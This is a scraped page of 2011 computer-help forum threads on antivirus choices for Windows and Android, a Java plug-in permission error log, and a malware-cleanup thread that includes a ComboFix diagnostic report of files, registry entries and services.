Explore topic-wise InterviewSolutions in .

This section includes InterviewSolutions, each offering curated multiple-choice questions to sharpen your knowledge and support exam preparation. Choose a topic below to get started.

3251.

Solve : defense system?

Answer»

Hello
What is the best integrated defense system can be installed in the computer ( Of course I do not mean the Patriots )Well, if you use WINDOWS then I would suggest Avast, Malwarebytes, and SuperantiSpyware.There is no best. Pick a good anti virus app (there are plenty from which to CHOOSE), supplement it with Spyware Blaster and either MalwareBytes or Super AntiSpyware (or both), and most important practices "SMART computing". If you don't use a router with a built in NAT you should ALSO use a FIREWALL - either the one provided by Windows or a 3rd party app.
Discussion
3252.

Solve : Anti Virus for Mobile Phones?

Answer»

Hi - you guys have helped me ENORMOUSLY with my computers. I don't have a mobile phone and know nothing about 'em - other than that apps LOOK like a lot of fun.

My Mum has just bought a Samsung Galaxy ACE with Android 2.2.

I've been browsing the Android Market from my PC and have seen some free anti-virus programs there.

Should she get some protection installed as soon as possible ?no
Quote from: Allan on July 09, 2011, 11:55:46 AM

no

Why not ?? What would it hurt ??

http://www.bbc.co.uk/news/technology-10928070

http://www.ibtimes.com/articles/100133/20110112/google-android-smartphones-mobile-devices-apple-ios-software-malware-virus-hackers-security-trojan-a.htmPhone viruses are rare and for the moment mostly limited to non-US phones
They are not PROVEN to do anything useful
They are a drag on the sysem
If you don't download or install crap on the phone there is zero danger regardless of where you are
Fair enough...........SMART phoning as well as smart computing, eh?Installing a Anti-virus on a phone is sort of like installing an Anti-virus on a *nux machine. It's pointless because the systems aren't a target for malware. (not because "Unix is inherently secure").

It's like taking a duvet into a Sauna in case you get the shivers. People just look at you weird and you ruin a duvet.
Discussion
3253.

Solve : email adress query?

Answer»

if i go on to a forum which is one of those were you have to be a member to read it , can the web site TELL my email adress even THOUGH i only LOOKED at there home PAGE and i am not a member??No.
Discussion
3254.

Solve : What does this Java message mean??

Answer»

I was watching an online MOVIE and it popped up and I notice in the message there's alot of "permission denied." What was denied?

Java Plug-in 1.6.0_26
Using JRE version 1.6.0_26-b03 Java HotSpot(TM) Client VM
User home directory = C:\Users\Doug

----------------------------------------------------
c: clear CONSOLE window
f: finalize objects on finalization queue
g: garbage collect
h: display this help message
l: dump classloader list
m: print memory usage
o: trigger logging
q: HIDE console
r: reload policy configuration
s: dump system and deployment properties
t: dump thread list
v: dump thread stack
x: clear classloader cache
0-5: set trace level to
----------------------------------------------------

exception: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/
exception: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/.
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown SOURCE)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/
java.lang.SecurityException: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/
exception: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/
exception: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/
exception: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
exception: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/
java.lang.SecurityException: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/
Discussion
3255.

Solve : Results of Hijack This scan?

Answer»

Quote

You sort of ended your last message with an instructional sentence without the instruction. I'll wait until I read your next message.
Sorry about that. I meant try to run the SREng program after running RKill.Tried to run all seven of them. Each one came up with the pop-up window Open With which showed about 20 programs starting with Adobe Acrobat. Frank C. Please try booting in Safe mode and run the SReng program.OK, there was one error, I think it was the .VBS item when I ran SREngLdr.EXE in Saft Mode. A pop up came up referring to Microsoft Security Essentials and asked me if I wanted to delete the program and for some odd reason I indicated Yes this time whereas before I indicated No. Now I have not been able to download, well MS Sec.Essen. did finally download to my desktop but now as with the other programs previously the Open With pop up screen appears, so MS Sec. Essen. will not run. I have the Windows Firewall turned on but cannot get MS Sec. Essen. to install again. I tried everything-turning the computer off/on, trying to download from another User, etc.

I was then able to download and run ComboFix before I had the above trouble with MS Sec. Essen. but was not able to transfer the CFScript.txt to it before ComboFix ran. I tried to "Save As" ComboFix to the desktop so as to transfer, copy, paste Cfscript.txt into it before running ComboFix but ComboFix took off on its own and ran and went through the whole scan automatically. Here is the text from the ComboFix Scan.
ComboFix 11-06-27.04 - Frank C 06/28/2011 12:44:47.3.8 - x64
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.4091.2561 [GMT -4:00]
Running from: c:\users\Frank C\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {108DAC43-C256-20B7-BB05-914135DA5160}
SP: Microsoft Security Essentials *Disabled/Updated* {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\ntuser.dat
.
.
((((((((((((((((((((((((( Files Created from 2011-05-28 to 2011-06-28 )))))))))))))))))))))))))))))))
.
.
2011-06-28 16:47 . 2011-06-28 16:47--------d-----w-c:\users\FLC\AppData\Local\temp
2011-06-28 16:47 . 2011-06-28 16:47--------d-----w-c:\users\Default\AppData\Local\temp
2011-06-28 14:59 . 2011-06-07 17:108873296----a-w-c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{58C50265-BA81-4990-974A-F92B1C415853}\mpengine.dll
2011-06-26 15:23 . 2011-06-26 15:2315672----a-w-c:\windows\system32\drivers\SWDUMon.sys
2011-06-26 15:23 . 2011-06-26 15:32--------d-----w-c:\program files (x86)\DriverUpdate
2011-06-19 09:40 . 2011-06-27 15:51--------d-----w-c:\program files (x86)\Google
2011-06-19 05:05 . 2011-06-19 05:05272480----a-w-c:\windows\system32\drivers\snapman.sys
2011-06-19 05:05 . 2011-06-19 05:05--------d-----w-c:\program files (x86)\Common Files\Acronis
2011-06-19 05:05 . 2011-06-19 05:05--------d-----w-c:\program files (x86)\Acronis
2011-06-19 00:49 . 2010-05-26 14:396144------w-c:\windows\system32\906D.tmp
2011-06-19 00:48 . 2010-05-26 14:396144------w-c:\windows\system32\41FF.tmp
2011-06-18 18:34 . 2010-05-26 14:396144------w-c:\windows\system32\EFA6.tmp
2011-06-18 18:33 . 2010-05-26 14:396144------w-c:\windows\system32\C55B.tmp
2011-06-18 18:32 . 2011-06-27 15:25--------d-----w-c:\program files (x86)\Sophos
2011-06-17 16:21 . 2011-06-27 15:53--------d-----w-c:\users\Frank
2011-06-17 15:09 . 2011-06-07 17:108873296----a-w-c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2011-06-17 14:58 . 2011-06-17 14:59--------d-----w-c:\users\Frank 2
2011-06-16 14:26 . 2011-06-16 14:26601424------w-c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{E268F7F9-7E96-44EE-BD43-DE481060C3A0}\gapaengine.dll
2011-06-16 14:25 . 2011-06-16 14:25--------d-----w-c:\program files (x86)\Microsoft Security Client
2011-06-16 14:25 . 2011-06-16 14:25--------d-----w-c:\program files\Microsoft Security Client
2011-06-15 20:45 . 2011-06-15 20:46--------d-----w-c:\program files (x86)\Kensington TrackballWorks
2011-06-15 20:45 . 2010-07-01 20:11370912----a-w-c:\windows\UnKWorks.exe
2011-06-15 16:08 . 2011-06-15 16:08--------d-----w-c:\program files (x86)\Common Files\Java
2011-06-15 00:19 . 2011-04-25 05:331923968----a-w-c:\windows\system32\drivers\tcpip.sys
2011-06-14 04:09 . 2011-06-27 15:53--------d--h--w-c:\users\AppData
2011-06-13 20:52 . 2011-06-13 20:52--------d-----w-c:\program files (x86)\EASEUS
2011-06-13 18:32 . 2011-06-13 18:32404640----a-w-c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2011-06-13 18:13 . 2011-06-13 18:13--------d-----w-c:\users\Default\AppData\Roaming\FixCleaner
2011-06-07 16:35 . 2011-06-07 16:35103864----a-w-c:\program files (x86)\Internet Explorer\Plugins\nppdf32.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-05-29 13:11 . 2010-07-15 03:2725912----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-29 01:24 . 2011-05-29 01:243703648----a-w-c:\windows\system32\AutoPartNt.exe
2011-05-29 00:52 . 2011-05-29 00:52961120----a-w-c:\windows\system32\drivers\timntr.sys
2011-05-26 18:48 . 2011-05-26 18:4881952----a-w-c:\windows\system32\drivers\tifsfilt.sys
2011-05-26 18:48 . 2011-05-26 18:48593952----a-w-c:\windows\system32\drivers\tdrpman.sys
2011-05-04 08:52 . 2010-07-12 21:26472808----a-w-c:\windows\SysWow64\deployJava1.dll
2011-04-22 22:15 . 2011-05-25 11:2727520----a-w-c:\windows\system32\drivers\Diskdump.sys
2011-04-18 13:15 . 2011-05-16 17:348802128----a-w-c:\programdata\Microsoft\Windows Defender\Definition Updates\{E1113CF7-7692-469D-B71A-26F7C834885B}\mpengine.dll
2011-04-13 14:28 . 2010-06-17 17:294283672----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup\markup.dll
2011-04-13 14:28 . 2010-06-17 17:2842776----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\dSM\StartResources.dll
2011-04-09 07:02 . 2011-05-11 10:595562240----a-w-c:\windows\system32\ntoskrnl.exe
2011-04-09 06:58 . 2011-05-11 17:19142336----a-w-c:\windows\system32\poqexec.exe
2011-04-09 06:02 . 2011-05-11 10:593967872----a-w-c:\windows\SysWow64\ntkrnlpa.exe
2011-04-09 06:02 . 2011-05-11 10:593912576----a-w-c:\windows\SysWow64\ntoskrnl.exe
2011-04-09 05:56 . 2011-05-11 17:19123904----a-w-c:\windows\SysWow64\poqexec.exe
2011-04-07 20:35 . 2011-04-07 20:35737072----a-w-c:\programdata\Microsoft\eHome\Packages\SportsV2\SportsTemplateCore-2\Microsoft.MediaCenter.Sports.UI.dll
2011-04-07 20:35 . 2011-04-07 20:354277016----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup-2\markup.dll
2011-04-07 20:34 . 2011-04-07 20:3442776----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\dSM-2\StartResources.dll
2011-04-07 20:34 . 2010-06-17 17:28539968----a-w-c:\programdata\Microsoft\eHome\Packages\MCESpotlight\MCESpotlight\SpotlightResources.dll
2011-04-06 16:50 . 2011-04-06 16:5074752----a-w-c:\windows\SysWow64\RegisterIEPKEYs.exe
2011-04-06 16:50 . 2011-04-06 16:50161792----a-w-c:\windows\SysWow64\msls31.dll
2011-04-06 16:50 . 2011-04-06 16:501126912----a-w-c:\windows\SysWow64\wininet.dll
2011-04-06 16:50 . 2011-04-06 16:5086528----a-w-c:\windows\SysWow64\iesysprep.dll
2011-04-06 16:50 . 2011-04-06 16:5076800----a-w-c:\windows\SysWow64\SetIEInstalledDate.exe
2011-04-06 16:50 . 2011-04-06 16:5074752----a-w-c:\windows\SysWow64\iesetup.dll
2011-04-06 16:50 . 2011-04-06 16:5063488----a-w-c:\windows\SysWow64\tdc.ocx
2011-04-06 16:50 . 2011-04-06 16:5048640----a-w-c:\windows\SysWow64\mshtmler.dll
2011-04-06 16:50 . 2011-04-06 16:50420864----a-w-c:\windows\SysWow64\vbscript.dll
2011-04-06 16:50 . 2011-04-06 16:50367104----a-w-c:\windows\SysWow64\html.iec
2011-04-06 16:50 . 2011-04-06 16:5023552----a-w-c:\windows\SysWow64\licmgr10.dll
2011-04-06 16:50 . 2011-04-06 16:50152064----a-w-c:\windows\SysWow64\wextract.exe
2011-04-06 16:50 . 2011-04-06 16:50150528----a-w-c:\windows\SysWow64\iexpress.exe
2011-04-06 16:50 . 2011-04-06 16:50142848----a-w-c:\windows\SysWow64\ieUnatt.exe
2011-04-06 16:50 . 2011-04-06 16:501427456----a-w-c:\windows\SysWow64\inetcpl.cpl
2011-04-06 16:50 . 2011-04-06 16:50110592----a-w-c:\windows\SysWow64\IEAdvpack.dll
2011-04-06 16:50 . 2011-04-06 16:5091648----a-w-c:\windows\system32\SetIEInstalledDate.exe
2011-04-06 16:50 . 2011-04-06 16:5089088----a-w-c:\windows\system32\RegisterIEPKEYs.exe
2011-04-06 16:50 . 2011-04-06 16:5049664----a-w-c:\windows\system32\imgutil.dll
2011-04-06 16:50 . 2011-04-06 16:5048640----a-w-c:\windows\system32\mshtmler.dll
2011-04-06 16:50 . 2011-04-06 16:5035840----a-w-c:\windows\SysWow64\imgutil.dll
2011-04-06 16:50 . 2011-04-06 16:50222208----a-w-c:\windows\system32\msls31.dll
2011-04-06 16:50 . 2011-04-06 16:50173056----a-w-c:\windows\system32\ieUnatt.exe
2011-04-06 16:50 . 2011-04-06 16:501389056----a-w-c:\windows\system32\wininet.dll
2011-04-06 16:50 . 2011-04-06 16:50135168----a-w-c:\windows\system32\IEAdvpack.dll
2011-04-06 16:50 . 2011-04-06 16:5012288----a-w-c:\windows\system32\mshta.exe
2011-04-06 16:50 . 2011-04-06 16:5011776----a-w-c:\windows\SysWow64\mshta.exe
2011-04-06 16:50 . 2011-04-06 16:50114176----a-w-c:\windows\system32\admparse.dll
2011-04-06 16:50 . 2011-04-06 16:50111616----a-w-c:\windows\system32\iesysprep.dll
2011-04-06 16:50 . 2011-04-06 16:50101888----a-w-c:\windows\SysWow64\admparse.dll
2011-04-06 16:50 . 2011-04-06 16:5085504----a-w-c:\windows\system32\iesetup.dll
2011-04-06 16:50 . 2011-04-06 16:5076800----a-w-c:\windows\system32\tdc.ocx
2011-04-06 16:50 . 2011-04-06 16:50603648----a-w-c:\windows\system32\vbscript.dll
2011-04-06 16:50 . 2011-04-06 16:50448512----a-w-c:\windows\system32\html.iec
2011-04-06 16:50 . 2011-04-06 16:5030720----a-w-c:\windows\system32\licmgr10.dll
2011-04-06 16:50 . 2011-04-06 16:50165888----a-w-c:\windows\system32\iexpress.exe
2011-04-06 16:50 . 2011-04-06 16:50160256----a-w-c:\windows\system32\wextract.exe
2011-04-06 16:50 . 2011-04-06 16:501492992----a-w-c:\windows\system32\inetcpl.cpl
2010-08-12 10:11 . 2010-07-09 17:262325792----a-w-c:\program files\cpuz64.exe
.
.
((((((((((((((((((((((((((((( [emailprotected]_14.09.12 )))))))))))))))))))))))))))))))))))))))))
.
+ 2010-06-15 09:52 . 2011-06-28 16:2285448 c:\windows\system32\wdi\ShutdownPerformanceDiagnostics_SystemData.bin
+ 2009-07-14 05:10 . 2011-06-28 16:2240014 c:\windows\system32\wdi\BootPerformanceDiagnostics_SystemData.bin
+ 2010-06-15 08:27 . 2011-06-28 16:2215194 c:\windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-3224318273-3311775750-3685103505-1000_UserData.bin
+ 2011-06-19 02:47 . 2011-06-18 22:4067584 c:\windows\system32\LogFiles\Srt\bootstat.dat
- 2010-06-15 06:50 . 2011-06-15 19:2116384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+ 2010-06-15 06:50 . 2011-06-28 14:4316384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2010-06-15 06:50 . 2011-06-15 19:2132768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2010-06-15 06:50 . 2011-06-28 14:4332768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- 2009-07-14 04:54 . 2011-06-15 19:2116384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2009-07-14 04:54 . 2011-06-28 14:4316384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2010-09-21 03:07 . 2010-09-21 03:0770584 c:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0400000010\9.4.0\adobeextractfiles.dll
+ 2010-06-27 11:00 . 2011-06-20 04:212842 c:\windows\system32\wdi\ERCQueuedResolutions.dat
+ 2011-05-04 13:07 . 2011-06-17 15:124376 c:\windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-3224318273-3311775750-3685103505-1006_UserData.bin
- 2011-06-16 14:08 . 2011-06-16 14:082048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
+ 2011-06-28 16:49 . 2011-06-28 16:492048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
- 2011-06-16 14:08 . 2011-06-16 14:082048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
+ 2011-06-28 16:49 . 2011-06-28 16:492048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
+ 2010-06-26 23:39 . 2011-06-28 14:41362386 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_S4.bin
+ 2010-06-17 04:47 . 2011-06-28 00:55377904 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_FastS4.bin
+ 2009-07-14 02:36 . 2011-06-18 23:00678144 c:\windows\system32\perfh009.dat
- 2009-07-14 02:36 . 2011-06-15 07:33678144 c:\windows\system32\perfh009.dat
- 2009-07-14 02:36 . 2011-06-15 07:33127164 c:\windows\system32\perfc009.dat
+ 2009-07-14 02:36 . 2011-06-18 23:00127164 c:\windows\system32\perfc009.dat
+ 2009-07-14 04:45 . 2011-06-28 15:09444696 c:\windows\system32\FNTCACHE.DAT
+ 2009-07-14 05:30 . 2011-06-20 22:42143360 c:\windows\system32\DriverStore\infstrng.dat
- 2009-07-14 05:30 . 2011-06-15 20:46143360 c:\windows\system32\DriverStore\infstrng.dat
+ 2009-07-14 05:30 . 2011-06-20 22:42143360 c:\windows\system32\DriverStore\infstor.dat
- 2009-07-14 05:30 . 2011-06-15 20:46143360 c:\windows\system32\DriverStore\infstor.dat
+ 2009-07-14 04:46 . 2011-06-28 16:56104728 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat
+ 2009-07-14 05:01 . 2011-06-28 16:48436856 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
+ 2011-06-14 06:11 . 2011-06-16 17:46667158 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1007-8192.dat
+ 2011-06-18 09:15 . 2011-06-18 09:15155648 c:\windows\Installer\{259BA1ED-FD51-4A05-B0E7-ED34BC5FBE20}\Icon.exe
+ 2010-09-21 03:07 . 2010-09-21 03:07338856 c:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0400000010\9.4.0\readerupdater.exe
+ 2010-09-21 03:07 . 2010-09-21 03:07932288 c:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0400000010\9.4.0\adobearm.exe
+ 2010-09-21 03:07 . 2010-09-21 03:07338856 c:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0400000010\9.4.0\acrobatupdater.exe
+ 2009-07-14 04:45 . 2011-06-28 16:237383570 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\tokens.dat
- 2009-07-14 04:45 . 2011-06-15 07:597383570 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\tokens.dat
+ 2011-06-24 13:59 . 2011-06-26 22:052747619 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1009-8192.dat
+ 2011-05-05 09:10 . 2011-06-22 09:051256804 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1006-8192.dat
+ 2010-06-17 07:14 . 2011-06-26 00:292326756 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-8192.dat
- 2010-06-15 09:13 . 2011-06-14 03:371258705 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-12288.dat
+ 2010-06-15 09:13 . 2011-06-19 03:381258705 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-12288.dat
+ 2010-11-14 19:00 . 2010-11-14 19:002697216 c:\windows\Installer\757ba.msi
+ 2010-11-30 17:34 . 2010-11-30 17:341682432 c:\windows\Installer\757b2.msi
+ 2011-04-06 19:08 . 2011-06-28 16:4836155613 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-4096.dat
+ 2011-06-08 04:39 . 2011-06-08 04:3919798016 c:\windows\Installer\9d257.msp
+ 2011-06-20 22:41 . 2011-06-20 22:4117836544 c:\windows\Installer\916af3.msi
+ 2011-06-01 19:34 . 2011-06-01 19:3448979968 c:\windows\Installer\2821a.msi
+ 2011-06-19 04:59 . 2011-06-19 04:59128596992 c:\windows\Installer\98d73.msi
+ 2009-07-14 05:30 . 2011-06-20 22:421036795904 c:\windows\system32\DriverStore\infpub.dat
- 2009-07-14 05:30 . 2011-06-15 20:461036795904 c:\windows\system32\DriverStore\infpub.dat
.
-- Snapshot reset to current date --
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files (x86)\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
"HydraVisionDesktopManager"="c:\program files (x86)\ATI Technologies\HydraVision\HydraDM.exe" [2009-11-04 380928]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"NUSB3MON"="c:\program files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2009-10-21 106496]
"ATICustomerCare"="c:\program files (x86)\ATI\ATICustomerCare\ATICustomerCare.exe" [2010-03-04 311296]
"Adobe Reader Speed Launcher"="c:\program files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2011-06-08 37296]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2011-03-30 937920]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2011-04-08 254696]
"KTbWorks"="c:\program files (x86)\Kensington TrackballWorks\KTbWorksL.exe" [2010-07-01 426064]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"GBTUpd"="c:\program files (x86)\GIGABYTE\GBTUpd\PreRun.exe" [2008-04-03 297480]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Device Detector 3.lnk - c:\program files (x86)\Olympus\DeviceDetector\DevDtct2.exe [2010-6-20 118784]
Qshelf.lnk - c:\program files\Microsoft Reference\Bookshelf 98\qshelf98.exe [2010-6-27 123904]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoThumbnailCache"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security PackagesREG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AODDriver;AODDriver;c:\program files (x86)\GIGABYTE\ET6\amd64\AODDriver.sys [2010-07-29 52280]
R3 esihdrv;esihdrv;

R3 etdrv;etdrv;c:\windows\etdrv.sys [2010-07-03 25640]
R3 GVTDrv64;GVTDrv64;c:\windows\GVTDrv64.sys [2010-08-11 30528]
R3 MEMSWEEP2;MEMSWEEP2;c:\windows\system32\906D.tmp

R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\DRIVERS\MpNWMon.sys

R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys

R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\Antimalware\NisSrv.exe [2010-11-11 282616]
R3 rtkio;rtkio;c:\program files (x86)\Realtek\Smart Dual Lan\rtkio.sys [2009-07-15 17392]
R3 SWDUMon;SWDUMon;c:\windows\system32\DRIVERS\SWDUMon.sys

R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys

R3 vpcuxd;USB Virtualization Stub Service;c:\windows\system32\drivers\vpcuxd.sys

R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe

R4 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe

R4 JMB36X;JMB36X;c:\windows\SysWOW64\XSrvSetup.exe [2009-08-06 65536]
R4 SDLService;SDLService;c:\program files (x86)\Realtek\Smart Dual Lan\SDLService.exe [2009-10-23 88064]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 57184]
R4 WTService;WTService;c:\windows\System32\atwtusb.exe

S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys

S1 AppleCharger;AppleCharger;c:\windows\system32\DRIVERS\AppleCharger.sys

S2 KTbWorksService;Kensington TrackballWorks Service;c:\program files (x86)\Kensington TrackballWorks\KTbWorksS.exe [2010-07-01 50256]
S2 OS Selector;Acronis OS Selector activator;c:\program files (x86)\Acronis\DiskDirector\OSS\reinstall_svc.exe [2010-09-29 2139400]
S2 Smart TimeLock;Smart TimeLock Service;c:\program files (x86)\GIGABYTE\Smart6\Timelock\TimeMgmtDaemon.exe [2009-10-13 114688]
S3 amdkmdag;amdkmdag;c:\windows\system32\DRIVERS\atikmdag.sys

S3 amdkmdap;amdkmdap;c:\windows\system32\DRIVERS\atikmpag.sys

S3 nusb3hub;NEC Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys

S3 nusb3xhc;NEC Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys

.
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-28 c:\windows\Tasks\FixCleaner Startup.job
- c:\program files (x86)\FixCleaner\FixCleaner.exe [2011-06-01 18:33]
.
2011-06-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000Core.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
2011-06-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000UA.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-19 9996320]
"MacroKeyManager"="WTMKM.exe" [2009-05-21 5594272]
